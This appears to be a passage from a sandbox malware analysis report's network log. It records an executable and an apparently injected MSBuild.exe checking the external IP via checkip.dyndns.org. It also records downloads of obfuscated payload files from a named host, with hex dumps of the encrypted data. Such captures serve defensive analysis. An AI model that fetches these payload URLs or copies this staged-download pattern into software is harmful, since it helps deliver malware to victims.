Jul 27, 2024 11:39:19.278050900 CEST	320	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c41af36aa32c7c568cf4813b414feee8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	193.122.6.168	80	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:39:20.019205093 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:39:22.288875103 CEST	320	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:22 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9262622e95dece7b69bcc344e30ead46 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49750	193.122.6.168	80	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:39:22.928464890 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:39:24.345159054 CEST	320	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4b6a2bab945a073e493b515e9cc655f6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.189.102	443	7148	C:\Users\user\Desktop\R86BRY7DdC.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:39:00 UTC	136	OUT	GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1 User-Agent: Mozilla/5.0 Host: investdirectinsurance.com Cache-Control: no-cache
2024-07-27 09:39:00 UTC	681	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:00 GMT Content-Type: application/octet-stream Content-Length: 47616 Connection: close etag: "ba00-66a2ddbd-31025;;;" last-modified: Thu, 25 Jul 2024 23:20:29 GMT accept-ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iyDBWl2J2CINakLILjEfRPt7miMCCJO82xHNXONOvQS3MoEmHdoRz86hXCeCWo3fE5QWMkWvkhRlhVk2N8yFZy%2B%2FzsZTRrPuKgRB1zn77kISN5jzaKBu5ml3jTz63I0gq%2BbSlz%2Fv4xrPCdJt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba8e88d7c4213-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:39:00 UTC	688	IN	Data Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 f7 db 0f 1a c5 cf bc 0b aa bc Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
2024-07-27 09:39:00 UTC	1369	IN	Data Raw: ce da 9c 4c 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c 8a 4c ae 69 b1 55 7e 4c 7e d2 4c ea 39 e8 1f 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 61 0e 3e 39 4c ea 23 4c 59 ae bf 8a 8a b2 b4 de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 45 4d 2a 2d 4c 6c d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 ec 4c 2b b1 4c 6c 3f 4c ae 60 4c 59 7b 4c 7e e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c 6c db 4c ae 36 4c 59 ac Data Ascii: L~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+LlLiU~L~L97L+LlfLLYa>9L#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYEM*-LlL)L~KLLYL+Ll?L`LY{L~LxLY2L+LlcLLYL~LLYJL+'LlL6LY
2024-07-27 09:39:00 UTC	1369	IN	Data Raw: ba 87 e5 b0 5b c4 c2 3f 4c 2b e0 4c 6c 29 0b d8 54 68 dc 35 e0 66 24 1e fb 37 47 41 63 4c 2b 1a 4c 6c 35 e9 2a 14 c4 c2 59 57 42 71 26 72 38 10 e6 10 91 e5 a7 9c 7d b9 7c 1e 67 4c 59 7d 4c 7e 17 5a 4e 50 c4 c2 40 1a cd 5f 9c 7d e9 c6 12 df 4c 59 23 4c 7e bf 5a 4e f8 c4 c2 d0 d7 c1 41 dd 3c 70 a2 67 11 5e c8 9b 4c 7e 47 4c ea 68 ee b9 5e 63 85 c5 51 84 12 9d bf ec 49 ad 77 4c 7e ef 4c ea 02 49 ad 3d 9a 0d 71 fb 78 53 66 a2 ce c4 c2 6c 6e 1e fc a1 06 6e bc 29 67 3d 0a 53 e3 24 c6 9d bf d2 07 01 90 4c 7e 48 4c ea 56 49 ad 83 65 72 a8 31 77 3c 4c ae 62 4c 59 1e c9 8a 61 ba 2c 41 10 e6 49 d7 c1 5a 9c 7d d8 d3 06 da 4c 59 06 4c 7e ba 5a 4e dd c4 c2 d9 5d 79 12 2b 6b c6 b0 b4 59 42 35 7e df ae 8b f5 20 30 a7 e0 e5 4c 2b 9c 4c 6c 96 7c 1e a7 10 e6 21 df ae 3f 09 Data Ascii: [?L+Ll)Th5f$7GAcL+Ll5*YWBq&r8}\|gLY}L~ZNP@_}LY#L~ZNA<pg^L~GLh^cQIwL~LI=qxSflnn)g=S$L~HLVIer1w<LbLYa,AIZ}LYL~ZN]y+kYB5~ 0L+Ll\|!?
2024-07-27 09:39:00 UTC	1369	IN	Data Raw: 34 47 41 c0 6f d9 a7 42 97 c8 92 47 88 4c 59 97 4c 7e eb 5a 4e d0 eb 1d d5 b7 22 b5 4c 6c 4f e9 2a 61 a9 5c 7f 4c 7e d3 4c ea 52 c4 c2 b7 8e e8 f1 b2 b4 67 4c ae b5 92 26 20 4c 7e 38 4c ea 22 4c 59 72 e4 f1 13 4c 6c df 4c ae 0d 10 e6 98 4c 7e 50 6b 7e e5 74 32 70 bd 88 81 67 e2 a4 59 8a 07 74 32 6b 87 d1 57 a0 07 13 99 3e cd 6b bd 84 0e 2c 5c 59 8a af 74 32 fb 78 e9 ff a0 07 43 74 32 87 cc a9 78 5a 08 96 0e ec a9 3a 4d e9 50 84 b4 04 d1 1e 11 e7 a0 85 52 62 5f bf ea 1b c8 23 0c 19 1d c9 8a ef 76 e3 79 4c 59 b7 1a cd 7d 0a 59 62 4c ae d9 4c 59 05 4c 7e 23 a6 f0 86 8c 98 7b 6f d9 26 4c 6c e3 b7 b3 37 4c 59 ad 4c 7e 41 4c ea 43 47 41 e7 4c 2b 9e 4c 6c 0b a5 60 4f 4c 59 c5 9b 5a f5 26 72 1a 74 32 6d ac 58 d2 5d bc a6 a4 61 f7 3a 4d 17 e0 66 6c 47 90 41 f3 14 Data Ascii: 4GAoBGLYL~ZN"LlO*a\L~LRgL& L~8L"LYrLlLL~Pk~t2pgYt2kW>k,\Yt2xCt2xZ:MPRb_#vyLY}YbLLYL~#{o&Ll7LYL~ALCGAL+Ll`OLYZ&rt2mX]a:MflGA
2024-07-27 09:39:00 UTC	1369	IN	Data Raw: 4c 2b b7 4c 6c 58 dc fc 66 4c 59 7c 4c 7e 5e a1 06 7e 4c 59 83 9a 0d 88 4b 18 c4 7c 1e 15 30 95 f1 9e ef ee ca 1e 21 4c 59 4d 4c 2b 94 a9 a8 b2 20 e4 14 da 7c d9 0d 3c 46 4c ea 99 4c 59 23 6f d9 4c 1a 48 9a 73 36 c9 ee b9 0d 41 96 79 eb fc 75 4c 59 94 47 d2 df b0 b6 6a 4c ae d5 4c 59 a9 2a ba 37 da cc f9 db 7d 6b a3 07 5e 2c 0c 85 dc fc 8e fd 68 d9 30 36 98 1e fb df 91 25 ef 4c 2b b2 4c 6c 49 e9 2a f8 84 82 67 63 e4 e5 4c ea 7b 4c 59 54 38 6d bf c8 d9 44 48 9b db 4c 59 07 4c 7e 20 a6 f0 85 8c 98 78 6f d9 25 4c 6c e0 b7 b3 34 4c 59 af 4c 7e 43 4c ea 40 47 41 e4 4c 2b 9d 4c 6c 08 a5 60 4c 4c 59 c7 9b 5a f7 26 72 19 74 32 2e ec 1b d1 5d bc a5 a4 61 f4 3a 4d 14 e0 66 6e 47 90 02 b1 55 52 df f9 d2 67 e2 86 fb fb ce 78 0d e4 0e 3e 68 6b 7e be 47 41 87 85 52 b3 Data Ascii: L+LlXfLY\|L~^~LYK\|0!LYML+ \|<FLLY#oLHs6AyuLYGjLLY7}k^,h06%L+LlIgcL{LYT8mDHLYL~ xo%Ll4LYL~CL@GAL+Ll`LLYZ&rt2.]a:MfnGURgx>hk~GAR
2024-07-27 09:39:00 UTC	1369	IN	Data Raw: 17 51 6b a8 0f 9e 49 ec 75 f1 57 47 90 e3 ce da 18 6b bd 52 0e 2c 09 59 8a 9b 47 41 e7 50 84 6f 97 c0 4b 9e 49 5d 62 84 d5 c2 17 93 5e 3c 1c 78 0d 37 0e 3e ab 7b ae 7e 54 50 38 4c 2b 21 a9 a8 4c 48 9b d7 4c 59 0f 4c 7e 33 4c ea f0 c4 c2 c5 8e e8 99 a9 a8 d5 4c ae 15 00 74 93 4c 7e 4b 4c ea 90 4c 59 26 91 e5 b1 4c 6c 3f 4c ae ae 10 e6 7b 4c 7e d0 da cc 1e eb 1d 27 0a 1e 88 0d 2f 63 4c ae d8 4c 59 34 3d 4e 88 6b 7e 1e 47 41 dd 4b 5e 37 5d bc ca 9d bf 15 2f 7a ac 4c 7e 40 4c ea ea eb 1d 05 6f d9 8e 9c 7d be e0 24 4e 4c 59 70 4c 7e 8e 7b ae 63 5e c8 bf fe ca c3 4c 6c 4c 4c ae a5 eb 1d 3d 4a 48 01 eb fc 09 4c 59 7b 47 d2 37 b0 b6 d0 4c ae 39 4c 59 52 2a ba 01 36 a2 ac 54 50 e9 4c 2b 7c 51 84 1f 48 9b 91 bb cd 5e 4c 7e d6 6b 7e 49 bb cd 17 4c 2b e8 1a 48 fd 02 Data Ascii: QkIuWGkR,YGAPoKI]b^<x7>{~TP8L+!LHLYL~3LLtL~KLLY&Ll?L{L~'/cLLY4=Nk~GAK^7]/zL~@Lo}$NLYpL~{c^LlLL=JHLY{G7L9LYR*6TPL+\|QH^L~k~IL+H
2024-07-27 09:39:00 UTC	1369	IN	Data Raw: 80 4c 59 9b 4c 7e 77 6d 5a 89 5e c8 26 ba ed b9 4c 6c 83 4c ae ec 49 ad 76 4d 7f b4 80 36 74 4c 59 3a 4c 2b f5 7e 9c be b8 bb 4a e1 05 0c 4c 7e 30 4c ea 3e ee b9 97 1f 3a b4 16 83 d7 4c ae 3e 4c 59 54 2a ba 49 4d eb 05 1a fe ee 4c 2b b3 4c 6c 9c 7c 1e b3 5e c8 f4 f2 b6 e4 4c ea 7a 4c 59 b5 1a cd ca 4d 6d 8a 80 54 da 4c 59 06 4c 7e ae 6d 5a f3 da 7c 37 05 91 24 4c 6c d8 4c ae 95 ee b9 3f 9e ef ed 40 b4 ad 4c 59 e5 4c 2b 78 a9 a8 37 4d af 8f ce da 72 4c 7e ea 4c ea d1 ee b9 0e 1f 3a 22 ef 8c 4e 4c ae d1 4c 59 8d 2a ba 14 4d eb e3 10 e6 43 4c 2b 2a 4c 6c 21 7c 1e 2e da 7c 1b 74 f0 bd 4c ea a7 4c 59 08 6f d9 87 9c 7d 63 d5 00 47 4c 59 5d 4c 7e 27 5a 4e 5e 4d 58 02 a9 3d 7e 4c 6c 45 4c ae 0c ee b9 d0 9e ef 43 42 b6 00 4c 59 bc 4c 2b a5 a9 a8 ec 4d af 2a c4 c2 Data Ascii: LYL~wmZ^&LlLIvM6tLY:L+~JL~0L>:L>LYTIML+Ll\|^LzLYMmTLYL~mZ\|7$LlL?@LYL+x7MrL~L:"NLLYMCL+Ll!\|.\|tLLYo}cGLY]L~'ZN^MX=~LlELCBLYL+M
2024-07-27 09:39:00 UTC	1369	IN	Data Raw: f6 72 92 36 a2 c1 cb 6e c9 7e 49 e0 2b 6b 32 15 c0 f1 cb 6e f2 63 e4 92 6d 5a 20 54 50 76 6c db 2c 4c 6c 86 dc fc a3 25 62 42 5e 6e 0b 0e a8 a9 35 71 ed 4c 2b b0 4c 6c 3e 4c ae 0b 76 31 89 6e 1e 89 31 96 fd 49 ad 63 5d 79 63 67 e2 72 5c 3e 98 0f 1a fe 13 c6 1d 4c ea 07 4c 59 4b 4c 2b 4e c0 14 41 15 c0 43 49 ad 7d df ae dd 31 96 3e 5e c8 a6 0e 6a 9e 4c 6c 35 4c ae eb 49 ad 71 4c 7e 2f 5a 4e f7 49 ad 4c 5d 79 4c 67 e2 e9 e9 2a 8c 42 35 e2 75 f1 87 de 7a 4a 0f 1a b8 c6 13 29 4c 6c d1 4c ae 38 4c 59 cf 53 86 85 a0 07 3e c4 c2 22 91 e5 7d 51 84 00 a5 60 74 ee b9 e3 e0 66 6c a1 06 ec ee b9 fb 62 84 47 66 e3 cb c6 12 96 91 25 e6 1b db bb fc 49 02 4c 59 85 63 85 83 7e 9c f0 50 84 a2 9e 49 36 63 e4 54 6d 5a 11 10 e6 01 6f d9 47 b2 b4 e5 3a 79 b1 02 76 60 7a ea fc Data Ascii: r6n~I+k2ncmZ TPvl,Ll%bB^n5qL+Ll>Lv1n1Ic]ycgr\>LLYKL+NACI}1>^jLl5LIqL~/ZNIL]yLg*B5uzJ)LlL8LYS>"}Q`tflbGf%ILYc~PI6cTmZoG:yv`z
2024-07-27 09:39:00 UTC	1369	IN	Data Raw: fb 0f 4c 59 47 4c 2b 6a 4b 18 cd b0 b4 9f ee b9 cd a6 a2 f7 47 90 9d d3 67 04 71 d5 87 d9 c9 13 b0 b4 cf 30 95 43 74 f0 07 6d 5a 16 74 32 3f a0 04 f2 f5 b0 94 98 4b c4 c4 c2 a3 2a ba 43 17 42 94 1f 89 a2 63 85 a9 05 90 2c cb 18 e0 78 0d 14 74 f0 c7 5a 4e ec 0c 19 71 aa 3e 7e ed 8e 37 4c ae dc 1f 89 c8 82 54 fb de 7a 82 bc 29 4e 5d 79 07 a9 a8 bb b9 ba 22 ee b9 d4 63 e4 bc 17 42 e2 10 e6 ea d7 c1 32 d6 41 e8 40 94 46 e4 a1 3e 63 e4 ec 5c ba af 54 50 ea 4c 2b 38 66 e3 68 dc fc 43 a9 5c 89 d8 18 d4 6b 7e 8b 7b 0e 81 29 fd 6e 9c 7d b9 b7 b3 ee 4c 59 02 4c 7e 6e 7b ae 01 4c 59 b8 78 2e b4 b8 38 ec 4c ae 31 4c 59 7e 39 aa d1 09 9c f0 e0 04 a0 0e 6a 98 4c 6c 32 4c ae 61 d1 65 9b 16 00 4f cf 28 8c 05 02 1b 4c 2b 74 4c 6c 7a 7c 1e 74 5e c8 fb 88 cb 11 4c ea fd 4c Data Ascii: LYGL+jKGgq0CtmZt2?K*CBc,xtZNq>~7LTz)N]y"cB2A@F>c\TPL+8fhC\k~{)n}LYL~n{LYx.8L1LY~9jLl2LaeO(L+tLlz\|t^LL
2024-07-27 09:39:00 UTC	1369	IN	Data Raw: a1 85 52 31 8c ec b0 c0 14 51 fd 68 7b 4c 7e e7 4c ea 1e eb 1d 17 78 2e 1f b8 38 b6 b8 bb db 4e 5b 04 4c 7e 1c 4c ea 36 ee b9 9f 0a 1e 0d 83 56 db 4c ae 36 4c 59 4c 3d 4e 01 0e a8 18 08 ef fe e4 f1 9f 4c 6c 34 4c ae 03 74 32 d3 3e 4d 05 c4 50 c3 fd 68 1d 4c 2b c3 4c 6c 0a 0b d8 e7 a9 5c 9e 39 aa 23 4b df 0a 4e 5b 41 4c 2b 28 4c 6c 22 7c 1e 2c da 7c 8c 11 c5 be 4c ea a5 4c 59 0b 6f d9 d6 0d 2f ea 1e 7c 5d 47 41 5e 4c 7e e2 4c ea 10 74 32 a2 cb dc f2 42 97 67 6d 8f ed 4c 59 01 4c 7e 6d 7b ae f4 a9 5c db 48 5d f5 fa 79 ec 4f ad 33 4c 59 a9 4c 7e 55 6d 5a 3e da 7c c9 c5 10 9a 4c 6c 31 4c ae 7b ee b9 14 0d 3c 98 28 3c f3 49 ad 18 4c 2b 76 4c 6c f7 02 d7 01 5b bc 30 91 44 32 3f cb ff 4c 59 b4 4c 2b 49 4b 18 e0 48 9b 08 bb cd 36 7b eb b9 4e e9 a0 4c 59 cc 4c 2b Data Ascii: R1Qh{L~Lx.8N[L~L6VL6LYL=NLl4Lt2>MPhL+Ll\9#KN[AL+(Ll"\|,\|LLYo/\|]GA^L~Lt2BgmLYL~m{\H]yO3LYL~UmZ>\|Ll1L{<(<IL+vLl[0D2?LYL+IKH6{NLYL+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	172.67.189.102	443	7148	C:\Users\user\Desktop\R86BRY7DdC.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:39:01 UTC	134	OUT	GET /assuence/litesolidCha/Ebagelog.bd HTTP/1.1 User-Agent: Mozilla/5.0 Host: investdirectinsurance.com Cache-Control: no-cache
2024-07-27 09:39:02 UTC	685	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:01 GMT Content-Type: application/octet-stream Content-Length: 400896 Connection: close etag: "61e00-66a37019-26977;;;" last-modified: Fri, 26 Jul 2024 09:44:57 GMT accept-ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=02mxMwsWu9A3yTInx5bDe2MaMYn6RHZyz4qX9HMrLyrqrY2qnxwwNUd%2F%2BIpid4GgpB%2BsN47JBcw6EooyPy9jipY5g0aBP%2BDWzJEPWnuJNP5ErnhemUtiREH19L56tFlHFn8U76m8np%2FYEOEi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba8f01ae58ce9-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:39:02 UTC	684	IN	Data Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 f7 db 0f 1a c5 cf bc 0b aa bc Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
2024-07-27 09:39:02 UTC	1369	IN	Data Raw: fb 4c ae 05 ce da 9c 4c 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c bb 7d 1f bf c4 c2 ea 9b 5a d2 4c ea e1 27 61 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 63 0d 3c 8d 6b 7e 23 4c 59 81 04 90 d2 8e ef de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 47 4e 28 39 1a 48 d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 ec 4c 2b b1 4c 6c 3f 4c ae 60 4c 59 7b 4c 7e e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c 6c db 4c ae Data Ascii: LL~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+Ll}ZL'a7L+LlfLLYc<k~#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYGN(9HL)L~KLLYL+Ll?L`LY{L~LxLY2L+LlcLLYL~LLYJL+'LlL
2024-07-27 09:39:02 UTC	1369	IN	Data Raw: da 7c c2 4c 7e da 4c ea c1 4c 59 58 4b 5e d4 1a 48 bf 9d bf b0 0f 1a 29 4c 7e 35 4c ea 4f eb 1d 46 78 2e dd eb e9 f2 4c ae af 3a 4d 84 9e ef 24 61 84 97 4c 59 db 4c 2b f2 4b 18 89 4c ae 62 a9 5c 98 ba 28 88 e5 b0 aa 7b 0e 34 4c 2b ce 4c 6c 23 0b d8 de 4d 58 2f f6 72 3b 4c ea 20 4c 59 7c 6f d9 4b 71 37 60 32 77 80 4c 59 9b 4c 7e 00 7b ae 99 4d 58 f4 29 fd b9 4c 6c 83 4c ae c8 ee b9 2e 20 a4 4e 2f 18 74 4c 59 3a 4c 2b 83 4b 18 6a 4d af 0e 47 41 0c 4c 7e 30 4c ea 3e ee b9 dd 65 72 e4 47 d1 d7 4c ae 3e 4c 59 e4 c9 8a 49 4d eb 62 ee b9 ee 4c 2b b3 4c 6c 9c 7c 1e f9 84 82 bd 69 fb e4 4c ea 7a 4c 59 55 38 6d ca 4d 6d cc c6 12 da 4c 59 06 4c 7e ae 6d 5a 00 a9 5c 7d ba ed 24 4c 6c 06 73 36 11 db 7d 99 eb 78 c6 5a 4e ad 4c 59 e5 4c 2b 72 60 a7 9d c0 14 36 82 f7 72 Data Ascii: \|L~LLYXK^H)L~5LOFx.L:M$aLYL+KLb\({4L+Ll#MX/r;L LY\|oKq7`2wLYL~{MX)LlL. N/tLY:L+KjMGAL~0L>erGL>LYIMbL+Ll\|iLzLYU8mMmLYL~mZ\}$Lls6}xZNLYL+r`6r
2024-07-27 09:39:02 UTC	1369	IN	Data Raw: 7e 97 6d 5a 25 54 50 60 4c 2b 2c 0a 59 44 18 cb ac 3a 4d 4f e0 66 96 01 f7 e9 43 34 d8 4c 2b b5 4c 6c bb 7c 1e 61 a9 5c 4a 69 fb f7 6b 7e 41 d5 d0 73 39 6c cd 4c 6c 67 4c ae 2e ee b9 29 72 77 38 4c ea 07 a9 5c 1b 69 be 37 1a 48 20 73 36 2f 63 c4 ed c8 8b 44 4c ea 9a 4c 59 21 6f d9 9e 0a 59 05 a8 6b 5e 3a 4d bd b3 f7 93 37 a3 76 4c 59 39 4c 2b f7 7e 9c 65 62 a7 d6 4c 59 0b 88 cb c5 28 3c 19 3a 4d 5d e4 f1 f6 56 c1 9f 21 e5 3d 4c 59 92 4c 7e 7a 6d 5a a4 a9 5c 58 5a 8e 44 1a 48 03 a2 67 12 bd 28 7a 4c 7e e6 4c ea d9 ee b9 3a b7 22 c8 4c 6c 47 48 9b bc 7b 0e 11 9b 5a a1 26 72 d8 63 c4 29 7f 48 26 4c 6c da 4c ae 97 ee b9 a8 88 cb 84 19 0c bb 3a 4d 6e 74 a2 04 95 01 35 4c ae 4f 4c 59 d1 3d 4e e4 76 e3 73 4c 59 19 78 2e a7 59 0b 59 59 8a 08 47 41 d0 85 d3 ca 81 Data Ascii: ~mZ%TP`L+,YD:MOfC4L+Ll\|a\Jik~As9lLlgL.)rw8L\i7H s6/cDLLY!oYk^:M7vLY9L+~ebLY(<:M]V!=LYL~zmZ\XZDHg(zL~L:"LlGH{Z&rc)H&LlL:Mnt5LOLY=NvsLYx.YYYGA
